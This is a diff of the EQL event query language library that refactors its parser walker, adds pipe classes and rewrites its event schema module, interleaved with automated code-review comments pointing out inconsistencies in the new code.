pipe.validate() - if bad_index is not None: - if isinstance(node.args[bad_index], tatsu.semantics.Node): - error_node = node.args[bad_index] - raise self._error(error_node, "Invalid arguments to '{}'".format(node.name)) - return pipe + args, hints = self.validate_signature(node, pipe_cls, args, hints) + self._pipe_schemas = pipe_cls.output_schemas(args, hints, self._pipe_schemas) + return pipe_cls(args) def walk__piped_query(self, node): """Callback function to walk the AST.""" if node.query is None: - first = EventQuery(EVENT_TYPE_ANY, Boolean(True)) + first = ast.EventQuery(EVENT_TYPE_ANY, ast.Boolean(True)) if not self.implied_base: raise self._error(node, "Missing base query") else: first = self.walk(node.query) - return PipedQuery(first, self.walk(node.pipes)) - def walk__named_query(self, node): - """Callback function to walk the AST.""" + self._in_pipes = True + if isinstance(first, ast.EventQuery): + base_event_types = [first.event_type] + else: + base_event_types = [q.query.event_type for q in first.queries] + + # Now, create the schema for each event in the array + flattened_schema = self._schema.flatten() + for event_type in base_event_types: + if event_type == EVENT_TYPE_ANY: + self._pipe_schemas.append(flattened_schema) + elif event_type in self._schema.schema: + self._pipe_schemas.append(Schema({EVENT_TYPE_GENERIC: self._schema.schema[event_type]})) + else: + self._pipe_schemas.append(Schema({EVENT_TYPE_GENERIC: {}})) + + return ast.PipedQuery(first, self.walk(node.pipes)) + + def walk__subquery_type(self, node): + """Get the subquery type.""" if not self._subqueries_enabled: raise self._error(node, "Subqueries not supported") + elif self._in_pipes: + raise self._error(node, "Not supported within pipe") + + if node.name not in ast.NamedSubquery.supported_types: + raise self._error(node, "Unknown subquery type '{name} of'") - if node.name not in NamedSubquery.supported_types: - options = ', '.join(NamedSubquery.supported_types) - raise 
self._error(node, "Unknown subquery '{name}' of. Available options are: " + options) - return NamedSubquery(node.name, self.walk(node.query)) + return node.name - def walk__named_params(self, node, get_param=None): + def walk__named_query(self, node): + """Callback function to walk the AST.""" + return ast.NamedSubquery(self.walk(node.stype), self.walk(node.query)), types.dynamic(types.BOOLEAN) + + def walk__named_params(self, node, get_param=None, position=None, close=None): """Callback function to walk the AST.""" params = OrderedDict() if get_param is None and len(node.params) > 0: raise self._error(node, "Unexpected parameters") for param in node.params: - key, value = get_param(param) + key, value = get_param(param, position=position, close=close) if key in params: - raise self._error(param, "Repeated parameter '{k}'") + raise self._error(param, "Repeated parameter {k}") params[key] = value - return NamedParams(params) + return ast.NamedParams(params) - def walk__subquery_by(self, node, num_values=None, get_param=None): + def walk__subquery_by(self, node, num_values=None, position=None, close=None, get_param=None): """Callback function to walk the AST.""" if not self._subqueries_enabled: raise self._error(node, "Subqueries not supported") 
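Review bot: walk__piped_query builds the pipe schemas with `flattened_schema = self._schema.flatten()` without checking that `self._schema` is set, whereas walk__event_query in the same hunk guards with `if self._schema and not self._schema.validate_event_type(...)`; if `_schema` can really be absent the pipe path raises AttributeError on the first piped query, and if it cannot, the guard above is misleading. I would settle on one reading, e.g. `if self._schema is None: raise self._error(node, "Pipes require a schema")` before the flatten, or drop the guard in walk__event_query (how `_schema` is initialised is outside this hunk). `self._in_pipes = True` is set before the pipes are walked and never cleared here; if a walker instance is reused, a comment naming where it is reset would help. walk__subquery_by's body continues past the end of the hunk.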
@@ -302,106 +779,181 @@ def walk__subquery_by(self, node, num_values=None, get_param=None): else: end = False error_node = node.join_values[max(num_values, len(node.join_values)) - 1] - raise self._error(error_node, "Expected {} value(s)".format(num_values), end=end) - - join_values = self.walk(node.join_values) - params = self.walk(node.params, get_param=get_param) + message = "Expected {num} value" + if num_values != 1: + message += "s" + raise self._error(error_node, message, num=num_values, end=end) + params = self.walk(node.params, get_param=get_param, position=position, close=close) query = self.walk(node.query) - return SubqueryBy(query, params, join_values) + if node.join_values: + join_values, join_hints = self.walk(node.join_values, event_type=query.event_type, split=True) + else: + join_values, join_hints = [], [] + return ast.SubqueryBy(query, params, join_values), join_hints def walk__join(self, node): """Callback function to walk the AST.""" + queries, close = self._get_subqueries_and_close(node) + return ast.Join(queries, close) + + def _get_subqueries_and_close(self, node, get_param=None): + """Helper function used by join and sequence to avoid duplicate code.""" if not self._subqueries_enabled: + # Raise the error earlier (instead of waiting until subquery_by) so that it's more meaningful raise self._error(node, "Subqueries not supported") - shared = [] + # Figure out how many fields are joined by in the first query, and match across all + first, first_hints = self.walk(node.queries[0], get_param=get_param, position=0) + num_values = len(first.join_values) + queries = [(first, first_hints)] + + for pos, query in enumerate(node.queries[1:], 1): + queries.append(self.walk(query, num_values=num_values, get_param=get_param, position=pos)) + + shared = node.ast.get('shared_by') close = None - if node.ast.get('shared_by'): - shared = self.walk(node.shared_by) + # Validate that each field has matching types + default_hint = 
types.get_type(types.union(types.PRIMITIVES, types.NULL)) + strict_hints = [default_hint] * num_values - # Figure out how many fields are joined by in the first query, and match across all - first = self.walk(node.queries[0]) - num_values = len(first.join_values) - queries = [first] # type: list[SubqueryBy] - queries.extend(self.walk(node.queries[1:], num_values=num_values)) + if shared: + strict_hints += [default_hint] * len(shared) + + def check_by_field(by_pos, by_node, by_hint): + # Check that the possible values for our field that match what we currently understand about this type + intersected = types.intersect_types(strict_hints[by_pos], by_hint) + if not intersected or not types.is_dynamic(by_hint): + raise self._type_error(by_node, "Unable to join {expected_type} to {actual_type}", + strict_hints[by_pos], by_hint) + + # Restrict the acceptable fields from what we've seen + strict_hints[by_pos] = intersected + + for qpos, (query, query_by_hints) in enumerate(queries): + unshared_fields = [] + curr_by_hints = query_by_hints + curr_join_nodes = node.queries[qpos].join_values + + if shared: + curr_shared_by, curr_shared_hints = self.walk(shared, event_type=query.query.event_type, split=True) + curr_by_hints = curr_shared_hints + curr_by_hints + query.join_values = curr_shared_by + query.join_values + curr_join_nodes = shared + curr_join_nodes - for query in queries: - query.join_values = shared + query.join_values + # Now that they've all been built out, start to intersect the types + for fpos, (n, h) in enumerate(zip(curr_join_nodes, curr_by_hints)): + check_by_field(fpos, n, h) - if node.ast.get('until'): - close = self.walk(node.until, num_values=num_values) # type: SubqueryBy - close.join_values = shared + close.join_values + # Add all of the fields to the beginning of this subquery's BY fields and preserve the order + query.join_values = unshared_fields + query.join_values - return Join(queries, close) + if node.ast.get("until"): + close, close_hints = 
self.walk(node.until, num_values=num_values, get_param=get_param, close=True) + close_nodes = [node.until] - def get_sequence_parameter(self, node): + if shared: + shared_by, shared_hints = self.walk(node.shared_by, event_type=close.query.event_type, split=True) + close_hints = close_hints + shared_hints + close.join_values = shared_by + close.join_values + close_nodes = shared + close_nodes + + # Check the types of the by field + for fpos, (n, h) in enumerate(zip(close_nodes, close_hints)): + check_by_field(fpos, n, h) + + # Unzip the queries from the (query, hint) tuples + queries, _ = zip(*queries) + return list(queries), close + + def get_sequence_parameter(self, node, **kwargs): """Validate that sequence parameters are working.""" - key, value = self.walk([node.k, node.v]) - value = TimeRange.convert(value) + key, (value, value_hint) = self.walk([node.k, node.v]) + value = ast.TimeRange.convert(value) if key != 'maxspan': - raise self._error(node, "Unknown sequence parameter '{}'".format(key)) + raise self._error(node, "Unknown sequence parameter {}".format(key)) - if not TimeRange.convert(value) or value.delta < datetime.timedelta(0): + if not ast.TimeRange.convert(value) or value.delta < datetime.timedelta(0): error_node = node.v if isinstance(node.v, tatsu.objectmodel.Node) else node - raise self._error(error_node, "Invalid value for '{}'".format(key)) + raise self._error(error_node, "Invalid value for {}".format(key)) return key, value - def get_sequence_term_parameter(self, param_node): + def get_sequence_term_parameter(self, param_node, position, close): """Validate that sequence parameters are working for items in sequence.""" - key, value = self.walk([param_node.k, param_node.ast.get('v', Boolean(True))]) - if value is None: - value = Boolean(True) + if not position or close: + raise self._error(param_node, "Unexpected parameters") + + # set the default type to a literal 'true' + value, type_hint = ast.Boolean(True), types.literal(types.BOOLEAN) + key 
= self.walk(param_node.k) + if param_node.ast.get('v'): + value, type_hint = self.walk(param_node.v) + + if key == 'fork': + if not types.check_types(types.literal((types.NUMBER, types.BOOLEAN)), type_hint): + raise self._type_error(param_node, + "Expected type {expected_type} value for {k}", + types.literal(types.BOOLEAN)) - if key != 'fork': - raise self._error(param_node, "Unknown parameter '{}'".format(key)) + if value.value not in (True, False, 0, 1): + raise self._error(param_node, "Invalid value for {k}") - elif not isinstance(value, (Boolean, Number)) or value.value not in (True, False, 0, 1): - raise self._error(param_node, "Invalid value for '{}'".format(key)) + else: + raise self._error(param_node, "Unknown parameter {k}") - return key, Boolean(bool(value.value)) + return key, ast.Boolean(bool(value.value)) def walk__sequence(self, node): """Callback function to walk the AST.""" if not self._subqueries_enabled: raise self._error(node, "Subqueries not supported") - shared = [] - close = None params = None - if node.ast.get('shared_by'): - shared = self.walk(node.shared_by) - if node.ast.get('params'): params = self.walk(node.params, get_param=self.get_sequence_parameter) - # Figure out how many fields are joined by in the first query, and match across all - first = self.walk(node.queries[0]) - num_values = len(first.join_values) - queries = [first] # type: list[SubqueryBy] - queries.extend(self.walk(node.queries[1:], num_values=num_values, get_param=self.get_sequence_term_parameter)) - - for query in queries: - query.join_values = shared + query.join_values - - if node.ast.get('until'): - close = self.walk(node.until, num_values=num_values) - close.join_values = shared + close.join_values - - return Sequence(queries, params, close) + queries, close = self._get_subqueries_and_close(node, get_param=self.get_sequence_term_parameter) + return ast.Sequence(queries, params, close) # definitions def walk__macro(self, node): """Callback function to walk the 
AST.""" - return Macro(node.name, node.params, self.walk(node.body)) + definition = ast.Macro(node.name, node.params, self.walk(node.body)) + self.new_preprocessor.add_definition(definition) + return definition def walk__constant(self, node): """Callback function to walk the AST.""" - return Constant(node.name, self.walk(node.value)) + value, _ = self.walk(node.value) + definition = ast.Constant(node.name, value) + self.new_preprocessor.add_definition(definition) + return definition + + +def _build_parser(): + """Build a parser one-time. These appear to be thread-safe so this only needs to happen once.""" + global GRAMMAR, compiled_parser + + if compiled_parser is not None: + return compiled_parser + + with compiler_lock: + if compiled_parser is None: + GRAMMAR = get_etc_file('eql.ebnf') + compiled_parser = tatsu.compile(GRAMMAR, parseinfo=True, semantics=tatsu.semantics.ModelBuilderSemantics()) + + return compiled_parser + + +def _get_parser(): + """Try to get a thread-safe parser, and compile if necessary.""" + if not hasattr(local, "parser"): + local.parser = _build_parser() + return local.parser def _parse(text, start=None, preprocessor=None, implied_any=False, implied_base=False, pipes=True, subqueries=True): 
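Review bot: In _get_subqueries_and_close the `until` branch orders the shared-by hints differently from the join values: `close_hints = close_hints + shared_hints` puts the until query's own hints first, while `close.join_values = shared_by + close.join_values` and `close_nodes = shared + close_nodes` put the shared ones first, so with a shared `by` the positions checked against `strict_hints` are swapped relative to the query loop above, which uses `curr_by_hints = curr_shared_hints + curr_by_hints`; change it to `close_hints = shared_hints + close_hints`. Also `close_nodes = [node.until]` holds one node for all of the until query's own join values, so `zip(close_nodes, close_hints)` stops after the first own field and any type error points at the whole until clause; the query loop uses `node.queries[qpos].join_values` per field, so `close_nodes = list(node.until.join_values)` would match it, assuming the until node exposes `join_values` as walk__subquery_by already reads it. Finally `unshared_fields = []` is never appended to, so `query.join_values = unshared_fields + query.join_values` and the comment above it are a leftover and can be dropped.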
@@ -418,34 +970,53 @@ def _parse(text, start=None, preprocessor=None, implied_any=False, implied_base= :param PreProcessor preprocessor: Optional preprocessor to expand definitions and constants :rtype: EqlNode """ - global GRAMMAR, tatsu_parser - - if tatsu_parser is None: - GRAMMAR = get_etc_file('eql.ebnf') - tatsu_parser = tatsu.compile(GRAMMAR, parseinfo=True, semantics=tatsu.semantics.ModelBuilderSemantics()) + parser = _get_parser() if not text.strip(): - raise ParseError("No text specified", 0, 0, text) + raise EqlParseError("No text specified", 0, 0, text) # Convert everything to unicode text = to_unicode(text) - walker = EqlWalker(implied_any=implied_any, implied_base=implied_base, - preprocessor=preprocessor, pipes=pipes, subqueries=subqueries) - - try: - model = tatsu_parser.parse(text, rule_name=start, start=start, parseinfo=True) - eql_node = walker.walk(model) - return eql_node - except tatsu.exceptions.FailedParse as e: - info = e.buf.line_info(e.pos) - message = e.message + + with ParserConfig(implied_any=implied_any, implied_base=implied_base, allow_subqueries=subqueries, + preprocessor=preprocessor, allow_pipes=pipes) as cfg: + + walker = EqlWalker() + load_extensions(force=False) + exc = None + + try: + model = parser.parse(text, rule_name=start, start=start, parseinfo=True) + eql_node = walker.walk(model) + if not isinstance(eql_node, ast.EqlNode) and isinstance(eql_node, tuple): + eql_node, type_hint = eql_node + return eql_node + except EqlError as e: + # If full traceback mode is enabled, then re-raise the exception + if cfg.read_stack("full_traceback", debugger_attached): + raise + exc = e + except tatsu.exceptions.FailedParse as e: + # Remove the tatsu exception from the traceback + exc = e + + if isinstance(exc, EqlError): + # at this point, the full traceback isn't wanted, so raise it from here + raise exc + + if isinstance(exc, tatsu.exceptions.FailedParse): + info = exc.buf.line_info(exc.pos) + message = 'Invalid syntax' line = 
info.line col = info.col + source = info.text.rstrip() if not source: - source = text.strip().splitlines()[-1].strip() + source = text.rstrip().splitlines()[-1].rstrip() col = max(len(source) - 1, 0) - raise ParseError(message, line, col, source) + + # Raise an EQL error instead + raise EqlSyntaxError(message, line, col, source) def parse_base_query(text, implied_any=False, implied_base=False, preprocessor=None, subqueries=True): @@ -480,7 +1051,7 @@ def parse_event_query(text, implied_any=False, implied_base=False, preprocessor= implied_any=implied_any, implied_base=implied_base, preprocessor=preprocessor, subqueries=subqueries) -def parse_query(text, implied_any=False, implied_base=False, preprocessor=None, subqueries=True, pipes=True): +def parse_query(text, implied_any=False, implied_base=False, preprocessor=None, subqueries=True, pipes=True, cli=False): """Parse a full EQL query with pipes. :param str text: EQL source text to parse @@ -493,7 +1064,8 @@ def parse_query(text, implied_any=False, implied_base=False, preprocessor=None, :param PreProcessor preprocessor: Optional preprocessor to expand definitions and constants :rtype: PipedQuery """ - return _parse(text, 'single_query', implied_any=implied_any, implied_base=implied_base, preprocessor=preprocessor, + rule = "cli_query" if cli else "single_query" + return _parse(text, rule, implied_any=implied_any, implied_base=implied_base, preprocessor=preprocessor, subqueries=subqueries, pipes=pipes) 
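Review bot: parse_query (the `@@ -493` hunk) gains the `cli` keyword but the visible `:param` block is not extended; add `:param bool cli: parse with the "cli_query" grammar rule instead of "single_query"` next to the other parameters. In _parse (the `@@ -418` hunk) the tatsu failure text that the removed code forwarded through `e.message` is replaced by the constant `'Invalid syntax'`, so callers of `EqlSyntaxError` lose the parser's reason; if hiding tatsu's wording is intended, a short comment on `message = 'Invalid syntax'` should record that, otherwise keep `message = exc.message`. The unpacking `eql_node, type_hint = eql_node` leaves `type_hint` unused, so `eql_node, _ = eql_node` reads as intended. _parse's signature and the start of its docstring are outside this hunk.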
@@ -512,6 +1084,28 @@ def parse_expression(text, implied_any=False, preprocessor=None, subqueries=True implied_any=implied_any, preprocessor=preprocessor, subqueries=subqueries) +def parse_atom(text, cls=None): # type: (str, type) -> ast.Field|ast.Literal + """Parse and get an atom.""" + rule = "single_atom" + atom = _parse(text, start="single_atom") + if cls is not None and not isinstance(atom, cls): + walker = EqlWalker() + tatsu_ast = _get_parser().parse(text, rule_name=rule, start=rule, parseinfo=True) + raise walker._error(tatsu_ast, "Expected {expected} not {actual}", + expected=cls.__name__.lower(), actual=type(atom).__name__.lower()) + return atom + + +def parse_literal(text): # type: (str) -> ast.Literal + """Parse and get a literal.""" + return parse_atom(text, cls=ast.Literal) + + +def parse_field(text): # type: (str) -> ast.Field + """Parse and get a field.""" + return parse_atom(text, cls=ast.Field) + + def parse_analytic(analytic_info, preprocessor=None, **kwargs): """Parse an EQL analytic from a dictionary with metadata. @@ -524,7 +1118,7 @@ def parse_analytic(analytic_info, preprocessor=None, **kwargs): text = dct['query'] query = parse_query(text, preprocessor=preprocessor, **kwargs) dct['query'] = query - return EqlAnalytic(**dct) + return ast.EqlAnalytic(**dct) def parse_analytics(analytics, preprocessor=None, **kwargs): @@ -536,7 +1130,7 @@ def parse_analytics(analytics, preprocessor=None, **kwargs): :rtype: list[EqlAnalytic] """ if preprocessor is None: - preprocessor = PreProcessor() + preprocessor = ast.PreProcessor() return [parse_analytic(r, preprocessor=preprocessor, **kwargs) for r in analytics] @@ -582,7 +1176,7 @@ def get_preprocessor(text, implied_any=False, subqueries=None, preprocessor=None # inherit all the definitions from the old one, and add to them if preprocessor is None: - new_preprocessor = PreProcessor() + new_preprocessor = ast.PreProcessor() else: new_preprocessor = preprocessor.copy() 
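Review bot: parse_atom defines `rule = "single_atom"` but the first parse passes the literal `start="single_atom"` and only the error path uses `rule`; write `atom = _parse(text, start=rule)` so both parses are guaranteed to run the same grammar rule. The error path re-parses the raw text with `_get_parser()` solely to obtain a node for `walker._error`, a private method of EqlWalker; a comment such as `# re-parse to recover parseinfo for the error position` would explain the double parse. The other hunks on this line (parse_analytic, parse_analytics, get_preprocessor) are namespace-only changes.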
diff --git a/eql/pipes.py b/eql/pipes.py
new file mode 100644
index 0000000..529d601
--- /dev/null
+++ b/eql/pipes.py
@@ -0,0 +1,179 @@ +"""EQL Pipes.""" +from .ast import PipeCommand, TimeRange +from .schema import Schema, EVENT_TYPE_GENERIC +from .types import dynamic, NUMBER, literal, PRIMITIVES, EXPRESSION, get_type +from .utils import is_string + +__all__ = ( + "list_pipes", + "ByPipe", + "HeadPipe", + "TailPipe", + "SortPipe", + "UniquePipe", + "CountPipe", + "FilterPipe", + "UniqueCountPipe", + "WindowPipe" +) + + +def list_pipes(): + """"Get all of the current pipes.""" + return list(sorted(PipeCommand.lookup)) + + +class ByPipe(PipeCommand): + """Pipe that takes a value (field, function, etc.) as a key.""" + + argument_types = [] + additional_types = dynamic(PRIMITIVES) + minimum_args = 1 + + +@PipeCommand.register('count') +class CountPipe(ByPipe): + """Counts number of events that match a field, or total number of events if none specified.""" + + minimum_args = 0 + + @classmethod + def output_schemas(cls, arguments, type_hints, event_schemas): + # type: (list, list, list[Schema]) -> list[Schema] + """Generate the output schema and determine the ``key`` field dyanmically.""" + base_hints = [get_type(t) for t in type_hints] + base_hints = ["mixed" if not is_string(t) else t for t in base_hints] + if len(arguments) == 0: + key_hint = "string" + elif len(arguments) == 1: + key_hint = base_hints[0] + else: + key_hint = base_hints + + return [Schema({ + EVENT_TYPE_GENERIC: { + "count": "number", + "percent": "number", + "total_hosts": "number", + "hosts": ["string"], + "key": key_hint, + } + }, allow_any=False, allow_generic=True)] + + +@PipeCommand.register('head') +class HeadPipe(PipeCommand): + """Node representing the head pipe, analogous to the unix head command.""" + + argument_types = [literal(NUMBER)] + minimum_args = 0 + DEFAULT = 50 + + @classmethod + def validate(cls, arguments, type_hints=None): + """After performing type checks, validate that the count is greater than zero.""" + index, arguments, type_hints = super(HeadPipe, cls).validate(arguments, type_hints) + 
if index is None and cls(arguments).count <= 0: + index = 0 + return index, arguments, type_hints + + @property + def count(self): # type: () -> int + """Get the number of elements to emit.""" + if len(self.arguments) == 0: + return self.DEFAULT + return self.arguments[0].value + + +@PipeCommand.register('tail') +class TailPipe(PipeCommand): + """Node representing the tail pipe, analogous to the unix tail command.""" + + argument_types = [literal(NUMBER)] + minimum_args = 0 + DEFAULT = 50 + + @classmethod + def validate(cls, arguments, type_hints=None): + """After performing type checks, validate that the count is greater than zero.""" + index = super(TailPipe, cls).validate(arguments, type_hints) + if index is None and cls(arguments).count <= 0: + index = 0 + return index + + @property + def count(self): # type: () -> int + """Get the number of elements to emit.""" + if len(self.arguments) == 0: + return self.DEFAULT + return self.arguments[0].value + + +@PipeCommand.register('sort') +class SortPipe(ByPipe): + """Sorts the pipes by field comparisons.""" + + +@PipeCommand.register('unique') +class UniquePipe(ByPipe): + """Filters events on a per-field basis, and only outputs the first event seen for a field.""" + + +@PipeCommand.register('unique_count') +class UniqueCountPipe(ByPipe): + """Returns unique results but adds a count field.""" + + minimum_args = 0 + + @classmethod + def output_schemas(cls, arguments, type_hints, event_schemas): + # type: (list, list, list[Schema]) -> list[Schema] + """Generate the output schema and determine the ``key`` field dyanmically.""" + event_schemas = list(event_schemas) + first_event_type, = event_schemas[0].schema.keys() + if any(v for v in event_schemas[0].schema.values()): + event_schemas[0] = event_schemas[0].merge(Schema({ + first_event_type: { + "count": "number", + "total_hosts": "number", + "hosts": ["string"], + "percent": "number", + } + }, allow_any=False, allow_generic=True)) + return event_schemas + + 
+@PipeCommand.register('filter') +class FilterPipe(PipeCommand): + """Takes data coming into an existing pipe and filters it further.""" + + argument_types = [EXPRESSION] + + @property + def expression(self): + """Get the filter expression.""" + return self.arguments[0] + + +@PipeCommand.register('window') +class WindowPipe(PipeCommand): + """Maintains a time window buffer for streaming events.""" + + argument_types = [literal(NUMBER)] + + minimum_args = 1 + maximum_args = 1 + + @property + def timespan(self): + """Get timespan as a TimeRange object.""" + return TimeRange.convert(self.arguments[0]) + + @classmethod + def validate(cls, arguments, type_hints=None): + """After performing type checks, validate that the timespan is greater than zero.""" + index, arguments, type_hints = super(WindowPipe, cls).validate(arguments, type_hints) + ts = cls(arguments).timespan + if index is None and (ts is None or ts.delta.total_seconds() <= 0): + index = 0 + return index, arguments, type_hints diff --git a/eql/schema.py b/eql/schema.py index f77c5b4..67c12a8 100644 --- a/eql/schema.py +++ b/eql/schema.py 
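Review bot: TailPipe.validate assumes the base `validate` returns only the bad index (`index = super(TailPipe, cls).validate(arguments, type_hints)` then `return index`), while HeadPipe.validate and WindowPipe.validate in the same file unpack it as `index, arguments, type_hints` and return the triple; if the base returns the triple, TailPipe's `index is None` test can never be true, the `count <= 0` check is skipped, and the caller gets a different return shape. Align it with HeadPipe: `index, arguments, type_hints = super(TailPipe, cls).validate(arguments, type_hints)` / `if index is None and cls(arguments).count <= 0: index = 0` / `return index, arguments, type_hints`. In WindowPipe.validate, `ts = cls(arguments).timespan` runs before `index` is inspected, so a type-mismatched or missing first argument reaches `TimeRange.convert` and `self.arguments[0]` instead of surfacing the type error; compute it inside the `if index is None` branch. Finally `list_pipes` opens its docstring with four quotes (`""""Get all ...`), which puts a stray `"` into `__doc__`, and both `output_schemas` docstrings spell "dyanmically".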
@@ -1,46 +1,304 @@ """Eventing data schemas.""" -from eql.etc import get_etc_path -from eql.utils import load_dump -import contextlib +import re +from .types import ( + Nested, Array, BASE_PRIMITIVES, check_types, + BASE_ALL, BASE_STRING, BASE_BOOLEAN, BASE_NULL, BASE_NUMBER +) +from .errors import EqlError +from .utils import is_string, is_number, ParserConfig - -SCHEMA_FILE = get_etc_path('schema.json') -_schema = {} +_global = None EVENT_TYPE_ANY = 'any' EVENT_TYPE_GENERIC = 'generic' +MIXED_TYPES = "mixed" +IDENT_RE = re.compile(r"^[a-zA-Z][a-zA-Z0-9_]*$") + + +class Schema(ParserConfig): + """Schema of all event types. + + Expected input format: + { + "process": { + "process_name": "string", + "command_line", "..." + }, + "complex": { + "flat": "string", + "somearray": [], + "somearray": ["string", "number", "boolean"], + "field1": {"nested_field": "mixed", "doublenested": [{"sub1": "string", "sub2": "field"}]}, + "flexiblefield": {} + } + """ + + _default_schema = None + + def __init__(self, events, allow_generic=True, allow_any=True, allow_missing=False): + """Create a schema.""" + self.allow_generic = allow_generic + self.allow_any = allow_any + self.allow_missing = allow_missing + self.schema = events + + if not self.validate_schema(): + raise EqlError("Invalid input schema {}".format(repr(events))) + + super(Schema, self).__init__(schema=self) + + def _validate_field_schema(self, field_schema): + """Validate that a field schema is correct.""" + if is_string(field_schema) and len(field_schema) > 0: + if field_schema == MIXED_TYPES: + return True + return check_types(BASE_PRIMITIVES, field_schema) + elif isinstance(field_schema, (list, tuple)): + return not field_schema or all(self._validate_field_schema(s) for s in field_schema) + elif isinstance(field_schema, dict): + for name, nested in field_schema.items(): + status = is_string(name) and IDENT_RE.match(name) and self._validate_field_schema(nested) + if not status: + return False + return True + return 
False + + def validate_schema(self): + """Validate that the schema is valid.""" + if not isinstance(self.schema, dict): + return False + + for key, event_schema in self.schema.items(): + status = is_string(key) and isinstance(event_schema, dict) + if not status: + return False + + for name, field_schema in event_schema.items(): + status = is_string(name) and self._validate_field_schema(field_schema) + if not status: + return False + return True + + @classmethod + def _convert_to_type(cls, schema): + """Convert a schema to the type system.""" + if schema == {} or schema == MIXED_TYPES: + return BASE_ALL + elif isinstance(schema, dict): + return Nested([(k, cls._convert_to_type(s)) for k, s in sorted(schema.items())]) + elif isinstance(schema, (list, tuple)): + return Array([cls._convert_to_type(s) for s in schema]) + else: + return schema + + def _get_path_hint(self, event_schema, path): + """Validate a field against a schema.""" + base = path[0] + subpath = path[1:] + + if is_number(base): + # if the index is numeric, then the field must be an array + if not isinstance(event_schema, (list, tuple)): + return + elif subpath: + # if it's nested, then we have to enumerate over the union of nested schemas + for subschema in event_schema: + hint = self._get_path_hint(subschema, subpath) + if hint: + return hint + return + else: + return self._convert_to_type(event_schema[0]) + elif isinstance(event_schema, (list, tuple)): + # strings can't index into arrays + return + elif event_schema == {}: + # if the event schema is wide open, then anything goes + return self._convert_to_type(event_schema) + elif isinstance(event_schema, dict) and base in event_schema: + if event_schema and subpath: + # check if the current field is in the schema, and we still have to recurse + return self._get_path_hint(event_schema[base], subpath) + else: + # return the type hint if one exists + return self._convert_to_type(event_schema[base]) + + def get_event_type_hint(self, event_type, path): + 
"""Validate that a field matches an event_type.""" + if not self.schema: + return BASE_ALL + elif event_type == EVENT_TYPE_ANY: + # search all of the known events, and find one that has this schema + if self.allow_any: + if not self.schema: + return BASE_ALL + for event_type in self.schema: + field_type = self.get_event_type_hint(event_type, path) + if field_type is not None: + return field_type + if self.allow_missing: + return BASE_ALL + elif event_type in self.schema: + # Convert the values to the expected string values or None + type_hint = self._get_path_hint(self.schema[event_type], path) + if type_hint is not None: + return type_hint + elif self.allow_missing: + return BASE_ALL + elif event_type == EVENT_TYPE_GENERIC: + if self.allow_generic: + return BASE_ALL + + def validate_event_type(self, event_type): + """Validate that an event type is allowed by the schema.""" + if event_type == EVENT_TYPE_ANY: + return self.allow_any + elif event_type in self.schema: + return True + elif event_type == EVENT_TYPE_GENERIC: + return self.allow_generic + elif not self.schema: + return True + else: + return False + + @classmethod + def _merge_subschema(cls, a, b): + """Merge two subschemas together recursively.""" + if a is None: + return b + elif b is None: + return a + if a == MIXED_TYPES or b == MIXED_TYPES: + return MIXED_TYPES + elif is_string(a) and is_string(b): + if a != b: + return MIXED_TYPES + return a + elif type(a) != type(b): + return MIXED_TYPES + elif isinstance(a, list): + if not a: + return b + elif not b: + return a + + strings_a = [s for s in a if is_string(s)] + strings_b = [s for s in b if is_string(s)] + nested_a = [s for s in b if not is_string(s)] + nested_b = [s for s in b if not is_string(s)] + + # Too complicated + if (strings_a or strings_b) and (nested_a or nested_b): + return [] + elif strings_a: + return list(sorted(set(strings_a).union(set(strings_b)))) + elif len(nested_a) == 1 and len(nested_b) == 1: + return 
[cls._merge_subschema(nested_a[0], nested_b[0])] + else: + return [MIXED_TYPES] + + elif isinstance(a, dict): + common_keys = set(a).union(set(b)) + return {k: cls._merge_subschema(a.get(k), b.get(k)) for k in common_keys} + else: + return MIXED_TYPES + + def merge(self, other): # type: (Schema) -> Schema + """Merge a schema (non-recursively) on to an existing one.""" + # prefer the keys of the original over the added one + empty_schemas = not all(other.schema.values()) + full_schema = {event: s.copy() for event, s in other.schema.items()} + for event_type, event_schema in self.schema.items(): + full_schema.setdefault(event_type, {}) + full_schema[event_type].update(event_schema) + return Schema(full_schema, + allow_generic=self.allow_generic or other.allow_generic, + allow_any=self.allow_any or other.allow_any, + allow_missing=(self.allow_missing or other.allow_missing) or empty_schemas) -def reset_schema(): - """Reset the schema to the default.""" - global _schema - update_schema(load_dump(SCHEMA_FILE)) + def flatten(self): # type: () -> Schema + """Flatten a schema to a single event type.""" + flattened = {} + empty_schemas = not all(self.schema.values()) + for event_type, event_schema in sorted(self.schema.items()): + flattened.update(event_schema) + return Schema({EVENT_TYPE_GENERIC: flattened}, + allow_generic=False, + allow_any=True, + allow_missing=self.allow_missing or empty_schemas) + @classmethod + def default(cls, default=None): # type: (Schema) -> Schema + """Retrieve the active schema or the default.""" + if default is not None: + cls._default_schema = default + return cls._default_schema -def check_event_name(name): - """Check if an event is recognized by the schema.""" - return name in (EVENT_TYPE_ANY, EVENT_TYPE_GENERIC) or name in _schema['event_types'] + @classmethod + def current(cls): # type: () -> Schema + """Retrieve the active schema or the default.""" + current = cls.read_stack("schema") + if current is None: + return cls.default() + return 
current + @classmethod + def _get_item_schema(cls, data): + """Get the schema for an event.""" + if isinstance(data, dict): + schema = {} + for k, v in data.items(): + s = cls._get_item_schema(v) + if IDENT_RE.match(k) and s is not None: + schema[k] = s + return schema -def update_schema(schema): - """Update the eventing schema.""" - _schema.clear() - _schema.update(schema) + if data is None: + return BASE_NULL + elif isinstance(data, list): + schema_base = set() + nested_schema = None + for v in data: + s = cls._get_item_schema(v) + if is_string(s): + schema_base.add(s) + elif s is not None: + if nested_schema is not None: + cls._merge_subschema(nested_schema, s) + else: + nested_schema = s + if nested_schema is not None and schema_base: + return MIXED_TYPES + elif schema_base: + return list(sorted(schema_base)) + else: + return nested_schema + elif is_string(data): + return BASE_STRING + elif isinstance(data, bool): + return BASE_BOOLEAN + elif is_number(data): + return BASE_NUMBER -@contextlib.contextmanager -def use_schema(schema=None): - """Context manager for using python's `with` syntax for using a schema when parsing.""" - current_schema = _schema.copy() - if schema is not None: - try: - update_schema(schema) - yield - finally: - update_schema(current_schema) + @classmethod + def learn(cls, events): + """Learn the active schema for a list of events.""" + from .events import Event + schema = {} + allow_generic = False + for event in events: + if not isinstance(event, Event): + event = Event.from_data(event) + if event.type == EVENT_TYPE_GENERIC: + allow_generic = True + item_schema = cls._get_item_schema(event.data) + schema[event.type] = cls._merge_subschema(schema.get(event.type), item_schema) + return Schema(schema, allow_generic=allow_generic) - else: - yield +EMPTY_SCHEMA = Schema({}, allow_generic=True, allow_any=True) -reset_schema() +Schema.default(EMPTY_SCHEMA) diff --git a/eql/shell.py b/eql/shell.py new file mode 100644 index 0000000..d0aec82 